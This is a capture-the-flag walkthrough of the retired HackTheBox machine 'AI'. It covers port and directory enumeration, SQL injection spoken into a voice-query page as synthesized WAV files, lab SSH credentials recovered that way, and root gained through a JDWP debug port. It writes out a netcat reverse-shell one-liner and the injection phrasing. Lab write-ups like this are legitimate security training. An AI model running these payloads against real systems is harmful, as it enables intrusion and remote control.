Name: AI
Release Date: 09 Nov 2019
Retire Date: 25 Jan 2020
OS: Linux
Base Points: Medium - Retired [0]
Rated Difficulty:
Radar Graph:
imth 00 days, 00 hours, 56 mins, 36 seconds
goeo 00 days, 02 hours, 30 mins, 37 seconds
Creator: MrR3boot
CherryTree File: CherryTree - Remove the .txt extension

We start box with the usual nmap -sC -sV -Pn -p- -oA ./AI

$ nmap -sC -sV -Pn -p- -oA ./AI
Starting Nmap 7.80 ( ) at 2020-09-06 03:27 EDT
Nmap scan report for
Host is up (0.095s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|   256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_  256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 5744.35 seconds

It appears that we have only SSH and HTTP running on their usual ports.  Let's check the HTTP page and fire up gobuster while we look around manually.


gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php

To make matters more confusing, when you hover over that AI icon and select AI, you're asked to process a WAV file to make a query.  Unless it's trying to use voice recog or some kind of stego, that's a new one on me.

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u -x php
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
2020/09/06 03:38:42 Starting gobuster
/images (Status: 301)
/index.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/uploads (Status: 301)
/db.php (Status: 200)
/intelligence.php (Status: 200)
/ai.php (Status: 200)
/server-status (Status: 403)
2020/09/06 13:00:06 Finished

Now we have some places to check.  Checking out "intelligence.php" gives us a VERY useful table.

Amazingly, I was not too far off with the voice recognition comment.  The page mentions that it is using the Male-US voice model with Microsoft, so after digging around MS's site for about an hour, I finally find this article.  I just need to figure out how to get my text into a wav format.  Well funny enough, there is a text2wave component of the festival package.  Let's play around with it.


$ sudo apt-get install festival -y

$ echo "Is this thing on question mark" | text2wave -o test.wav


If you play the wave file, it says EXACTLY what is echo'ed.  So it actually says question mark.  I wonder how that's going to play with the query punctuation, but I suspect that's where the "AI" portion comes in.  Let's try it out on the users tables with both username and password.


$ echo "open single, quote, join, select, username from users, pound sign" | text2wave -o username.wav
$ echo "open single, quote, join, select, password from users, pound sign" | text2wave -o password.wav


and then upload those wav files to the AI page.  Below are screenshots of the results.

Well hello there alexa!  It looks like we have some creds.  alexa:H,Sq9t6}a<)?q93_ which will let us SSH into the box.  Time to run and find our way to PrivEsc.  As always, the LinEnum output is in the CTB file.  Around line 743 (trust me, this crap gets boring to read, but has the possibility of saving you DAYS of work trying to find it manually without the script), we find a nice section of Java Debug Wire Protocal information.


root 24722 18.5 5.5 3137572 110584 ? Sl 17:24 0:04 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/ -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 org.apache.catalina.startup.Bootstrap start


That's straight from the CTB.  So, JDWP is running on localhost:8000.  I'm not great at Java debugging, but I know someone who is (Thanks again Raiden99!).  The Java Debugger is hugely disappointing, especially since none of the alternative to Oracle Jave have it, and we can't connect to port 8000 and can't install it on the Target. A quick Google search brings us to and with this we should be able to get a root shell.  So, create your usual nc reverse shell script:


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f


and move it and the script to the TARGET box.  Set up 2 nc listeners.  One on your machine, and the other to 8005 on the Target.  Then, execute the shellifier.  Boom goes the dynamite and you're a rooted box.

That's all, folks!